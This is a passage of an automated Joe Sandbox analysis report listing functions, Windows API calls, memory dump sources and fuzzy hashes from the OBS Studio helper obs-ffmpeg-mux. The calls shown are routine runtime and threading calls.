_amsg_exit.MSVCRT ref: 00007FF8BFB51086

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: b553eb0038be5d07e6e415a4f5416fb2498995f0916b4543aad5407793640784
Instruction ID: 2320c2dd9df4a83468906a467fc3053bfd429c3e31bdbaa98591c38f243dd764
Opcode Fuzzy Hash: b553eb0038be5d07e6e415a4f5416fb2498995f0916b4543aad5407793640784
Instruction Fuzzy Hash: B0416932F0968295FA528B9EE97127963A5EF887D4F884032DF0C47394DE3CF8819341

Function 00007FF8A7BE1010 Relevance: 6.1, APIs: 4, Instructions: 124sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF8A7BE105D
_amsg_exit.MSVCRT ref: 00007FF8A7BE1086

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 3224bf86eb5cef696b33d2aba6a83138660028b8981cd15249a10f7ce29e597b
Instruction ID: 518153e9bc186585ea2ac767f8c681087bd4cd639590003dcc9ea6d97d75025f
Opcode Fuzzy Hash: 3224bf86eb5cef696b33d2aba6a83138660028b8981cd15249a10f7ce29e597b
Instruction Fuzzy Hash: 974190B2F0B54AA5F7529F16E96027D22A1EF847C4F644036CE1C573A1EE3CE882B301

Function 00007FF8A7BE66B0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7BE66D8
strchr.MSVCRT ref: 00007FF8A7BE670F
strlen.MSVCRT ref: 00007FF8A7BE67FB

Strings

ALL, xrefs: 00007FF8A7BE66F8

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strlen$strchr
String ID: ALL
API String ID: 3013107155-2914988887
Opcode ID: fcefe4586e90ed2a4975fb323870bf9105dc7dc9ba43fdb0f7cef785815bcb23
Instruction ID: 28003633ccd26b2ed30e52333e67425bb23a58e4168a2ebded8f6c1bb61b4155
Opcode Fuzzy Hash: fcefe4586e90ed2a4975fb323870bf9105dc7dc9ba43fdb0f7cef785815bcb23
Instruction Fuzzy Hash: A83125B6B0B06160FF66CD316A34B7D49929B467D8F494830CE1917BC5EA7CAC87A300

Function 00007FF8BFBA1CF0 Relevance: 6.1, APIs: 4, Instructions: 102threadCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFBA1D5C
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA1DDB
ResumeThread.KERNEL32 ref: 00007FF8BFBA1E0A

Part of subcall function 00007FF8BFBA56D0: CloseHandle.KERNEL32 ref: 00007FF8BFBA5775
Part of subcall function 00007FF8BFBA56D0: CloseHandle.KERNEL32 ref: 00007FF8BFBA5785

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFBA1E42

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CloseHandle$ResumeThread_beginthreadexfreemalloc
String ID:
API String ID: 1141387253-0
Opcode ID: 66f779a04675420d10c3e0e1a40261c3780ffcd5451449fc6e1faf9f36e06287
Instruction ID: adb5b4b273f7d4821030ea0aadc3fb8010b88b015c409e41575a7ee180dfe3de
Opcode Fuzzy Hash: 66f779a04675420d10c3e0e1a40261c3780ffcd5451449fc6e1faf9f36e06287
Instruction Fuzzy Hash: E441E232A08B8586E7A18F59E4006AAB3A0FF98BD4F549130EF8D03B54EF3CD951CB40

Function 00007FF8BFBA1AE0 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ed3023e85355d8c7d662a5ea9ebd51d1dc57e461f8a813a7e81e918f6af5b3
Instruction ID: c5bf6fddf33dbb7d7064e7e14b991c7c636a037742b4ff62255f36f921a75317
Opcode Fuzzy Hash: a5ed3023e85355d8c7d662a5ea9ebd51d1dc57e461f8a813a7e81e918f6af5b3
Instruction Fuzzy Hash: 10416B76A08B0686EB51DF99A84013973A5FF88BD0B989435CF4D437A4EF3CE856CB00

Function 00007FF8BFBA1790 Relevance: 6.1, APIs: 4, Instructions: 96threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

SuspendThread.KERNEL32 ref: 00007FF8BFBA1845
WaitForSingleObject.KERNEL32 ref: 00007FF8BFBA1850
ResumeThread.KERNEL32 ref: 00007FF8BFBA188E

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Thread$ObjectResumeSingleSuspendWait
String ID:
API String ID: 879609812-0
Opcode ID: e0952a9e7b9d2dd58eff9cf88d52fd7236f715f562f819b9b31cf785f32f6f21
Instruction ID: 207e47eccf29379d47344cedd6975a44dd94930060bf8835a640f5d4e3620f72
Opcode Fuzzy Hash: e0952a9e7b9d2dd58eff9cf88d52fd7236f715f562f819b9b31cf785f32f6f21
Instruction Fuzzy Hash: 43418032A0858582FB618F69E0413BD73A1FF94B98F549131DB4D47699DF3CE989CB40

Function 00007FF8A7C96900 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF8A7C9695A
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7C9699A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 1a996603528365f6f637cd234a293156ba757802906f7287cb03bbb997d6b298
Instruction ID: e17681d39c7f85a3fdb1ffaff0833d93b4b0a8574c4d3bff5a87b552f1fa15b7
Opcode Fuzzy Hash: 1a996603528365f6f637cd234a293156ba757802906f7287cb03bbb997d6b298
Instruction Fuzzy Hash: 1B3104B2A0DA81C6E3A08F24F42036D76A0FB857D4F548231EAE8A77C4DF3DD5809B00

Function 00007FF8BFB8C87C Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C459
Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C492
Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C8F7
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C906
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C982
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C991

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction ID: d06f21f864826966cc72f150ea8c4e5e341a0fac5771a52dd55e028f12252c3f
Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction Fuzzy Hash: 184128B2A08B9589FB02CFA8D8813AC77B0FB94B88F548029DB4D5779ADF7C9541C710

Function 00007FF8A7C9BF60 Relevance: 6.1, APIs: 4, Instructions: 84timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A7C9BF93
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A7C9BFF9
_errno.MSVCRT ref: 00007FF8A7C9C056
_errno.MSVCRT ref: 00007FF8A7C9C083

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Time$FileSystem_errno
String ID:
API String ID: 3586254970-0
Opcode ID: 49a1365162b2beb6e2a3ccfb8f5b0d34ed3bda1431d8c2c1350c42e5770df44f
Instruction ID: 8a36f4524a78bebce3a2e485db3e74859eb3d84b896300895fbe153ad5f2fb56
Opcode Fuzzy Hash: 49a1365162b2beb6e2a3ccfb8f5b0d34ed3bda1431d8c2c1350c42e5770df44f
Instruction Fuzzy Hash: 5B31C223B0AA4A97EFA58F35EE4017D6691EB94BD4F589231DD1D477E4EE3CE4009200

Function 00007FF8BFBA2670 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199528771ef270659c4c603ab843dedc8cd56cbcb61e71196821b80f414cc4d2
Instruction ID: 128e7d96f72da1ad62b91e2aa13d58dfe5c2f80784d5155ed96248d618aa8cd5
Opcode Fuzzy Hash: 199528771ef270659c4c603ab843dedc8cd56cbcb61e71196821b80f414cc4d2
Instruction Fuzzy Hash: 31313836A09B41CAEB69CF99E940228B7B4FB48FD4B699039DB4D03B54DF38E950C740

Function 00007FF8A7C081C0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7C0822F
_aligned_malloc.MSVCRT ref: 00007FF8A7C08249
memset.MSVCRT ref: 00007FF8A7C0825C

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free_aligned_mallocmemset
String ID:
API String ID: 881591362-0
Opcode ID: cb9fa4dfdc566d95d76ac6a2519e6b12bbd1fac9c9e4a918d491552342bc60f3
Instruction ID: 8c238d329de5e6f8f65174c0511142bbe3d7b9f85992c7f2eeb58729dd8fbe88
Opcode Fuzzy Hash: cb9fa4dfdc566d95d76ac6a2519e6b12bbd1fac9c9e4a918d491552342bc60f3
Instruction Fuzzy Hash: CD218BA2B0AB4195FB525F65FA4036C73E1EB58BD4F488130CE5D23B95EE7C9586A300

Function 00007FF8A7C9B1F0 Relevance: 6.1, APIs: 4, Instructions: 69synchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 00007FF8A7C9B221

Part of subcall function 00007FF8A7C99840: TlsGetValue.KERNEL32 ref: 00007FF8A7C9985D

WaitForSingleObject.KERNEL32 ref: 00007FF8A7C9B27E
CloseHandle.KERNEL32(?,?,?,-00000028,?,00007FF8A7C217F6), ref: 00007FF8A7C9B290
CloseHandle.KERNEL32(?,?,?,-00000028,?,00007FF8A7C217F6), ref: 00007FF8A7C9B29C

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Handle$Close$InformationObjectSingleValueWait
String ID:
API String ID: 3336430066-0
Opcode ID: 549c524895db14aa5244f77738d71316e65da89358fac4c80a16bd5f07bf5018
Instruction ID: 7e980a150239bb34452773316254b3da70088bc522f59bbc26bc76cca17e4601
Opcode Fuzzy Hash: 549c524895db14aa5244f77738d71316e65da89358fac4c80a16bd5f07bf5018
Instruction Fuzzy Hash: C9210A22B1AE82A1FB919F51D4496FE6394EF84BE0F484A35DE2D462D2DE2CD841E344

Function 00007FF8A7C12150 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7C12184

Part of subcall function 00007FF8A7BE5DA0: strlen.MSVCRT ref: 00007FF8A7BE5DF3

strlen.MSVCRT ref: 00007FF8A7C121AC
strcmp.MSVCRT ref: 00007FF8A7C121FC

Part of subcall function 00007FF8A7BE66B0: strlen.MSVCRT ref: 00007FF8A7BE66D8
Part of subcall function 00007FF8A7BE66B0: strchr.MSVCRT ref: 00007FF8A7BE670F

Strings

yuv420p, xrefs: 00007FF8A7C121DA

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strlen$strchrstrcmp
String ID: yuv420p
API String ID: 3490844034-503634524
Opcode ID: 633ea0c1e1550fd14e7121fbcdf51e94ec169c277e73b1c36fc1efad037321a4
Instruction ID: 4c71baffa9ed4eb5e31037745083341499aa6ceaecf438c4f2b82f96bb9ea063
Opcode Fuzzy Hash: 633ea0c1e1550fd14e7121fbcdf51e94ec169c277e73b1c36fc1efad037321a4
Instruction Fuzzy Hash: 3421F195F1E58270FF358E20A41137D6790EF42BE4F844272DA1E066D1EF6CE685E305

Function 00007FF8BFBA5E70 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8BFBA1B64,?,?,?,?,?,00000002,00000000,00007FF8BFBA4983), ref: 00007FF8BFBA5F1E

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 96d3de31802f6f9abf018a6055aabe2c4eb702216a45d5bc26d38f291c6951f2
Instruction ID: dcaffe2a5763d4336a5dffa5c7d49316443f909f5c2fecc951f66587484f3919
Opcode Fuzzy Hash: 96d3de31802f6f9abf018a6055aabe2c4eb702216a45d5bc26d38f291c6951f2
Instruction Fuzzy Hash: 90217F32A18B4282F764DFA9E44092A77A1FB847D0F549131EB5D43BD4EF3DE9158B00

Function 00007FF8A7BF05F0 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7BF0678
_aligned_free.MSVCRT ref: 00007FF8A7BF0682
_aligned_free.MSVCRT ref: 00007FF8A7BF068C
_aligned_free.MSVCRT ref: 00007FF8A7BF0697

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: d8a117b9735c8cceecb487bba0c084549c0ddfc89fe5e4f491a561c101f37a0f
Instruction ID: 918c8528e8e282531c652f5b9e1c03c67f5c12eac8c674df3ed8dd041568ffa3
Opcode Fuzzy Hash: d8a117b9735c8cceecb487bba0c084549c0ddfc89fe5e4f491a561c101f37a0f
Instruction Fuzzy Hash: 6711C422B0762262EF5AAF09944DA6E129AEF88BD1F010539DE4D46392DF7CDC42D3C0

Function 00007FF8BFBA58A0 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFBA58C5

Part of subcall function 00007FF8BFBA3E30: TlsSetValue.KERNEL32 ref: 00007FF8BFBA3F19

_endthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA5929
_endthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA594E

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _endthreadex$Valuefree
String ID:
API String ID: 1763976194-0
Opcode ID: ad5126445cb35a49f1ec9a11fd8a50259baa29f677a2b30741e53d48839e9ca9
Instruction ID: 47fe2fb70e0e800a139bacb710e58f88cb4ca6981b3823c4b7be705bb9268eb6
Opcode Fuzzy Hash: ad5126445cb35a49f1ec9a11fd8a50259baa29f677a2b30741e53d48839e9ca9
Instruction Fuzzy Hash: F8214F32704B0182DB109F6DE89016D7360FB88BA4B241235DF6E477A5DF3DD999C700

Function 00007FF8BFBA5CF0 Relevance: 6.1, APIs: 4, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF8BFBA1BA8,?,?,?,?,?,00000002,00000000,00007FF8BFBA4983), ref: 00007FF8BFBA5D3C

Part of subcall function 00007FF8BFBA2F10: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000018,00007FF8BFBA25B8), ref: 00007FF8BFBA2FFF

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8BFBA1BA8,?,?,?,?,?,00000002,00000000,00007FF8BFBA4983), ref: 00007FF8BFBA5D54
